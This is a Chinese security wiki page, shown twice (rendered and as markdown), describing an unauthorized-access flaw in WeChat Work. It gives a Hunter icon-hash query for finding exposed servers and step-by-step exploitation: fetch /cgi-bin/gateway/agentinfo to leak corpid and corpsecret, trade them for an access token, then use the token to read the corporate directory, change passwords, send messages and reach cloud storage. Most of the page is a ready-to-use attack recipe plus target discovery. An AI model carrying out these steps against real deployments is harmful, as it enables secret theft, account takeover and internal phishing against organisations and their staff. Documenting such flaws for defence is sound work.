fofamini-wiki

登录白背景

源码

企业微信接口未授权访问漏洞

一、漏洞简介

企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息，可导致企业微信全量数据被获取，文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。

二、影响版本

企业微信

三、资产测绘

hunter：web.icon=="e1750fed09bcc7df102a0e593ffe2b69"

登录页面：

四、漏洞复现

通过泄露信息接口可以获取corpid和corpsecret

https://<企业微信域名>/cgi-bin/gateway/agentinfo

使用corpsecret和corpid获得token，其中corpid为上图中strcorpid、corpsecret为上图中Secret

https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET

使用token访问诸如企业通讯录信息，修改用户密码，发送消息，云盘等接口

具体利用查看[企业微信开发者中心文档](https://developer.work.weixin.qq.com/document/path/90664)

原文: https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab

# 企业微信接口未授权访问漏洞

# 一、漏洞简介
企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息，可导致企业微信全量数据被获取，文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。

# 二、影响版本

- 企业微信

# 三、资产测绘

- hunter：`web.icon=="e1750fed09bcc7df102a0e593ffe2b69"`

![image.png](./img/BQkOXYezQukpooIW/1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b-921778.png)

- 登录页面：

![image.png](./img/BQkOXYezQukpooIW/1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b-911134.png)

# 四、漏洞复现

1. 通过泄露信息接口可以获取`corpid`和`corpsecret`
```
https://<企业微信域名>/cgi-bin/gateway/agentinfo
```
![image.png](./img/BQkOXYezQukpooIW/1691831388927-6404a99b-4034-461e-a122-4b378f76f340-572480.png)

2. 使用`corpsecret`和`corpid`获得`token`，其中`corpid`为上图中`strcorpid`、`corpsecret`为上图中`Secret`
```
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
```
![image.png](./img/BQkOXYezQukpooIW/1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504-042239.png)

3. 使用token访问诸如企业通讯录信息，修改用户密码，发送消息，云盘等接口

具体利用查看[企业微信开发者中心文档](https://developer.work.weixin.qq.com/document/path/90664)
![image.png](./img/BQkOXYezQukpooIW/1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c-017782.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab>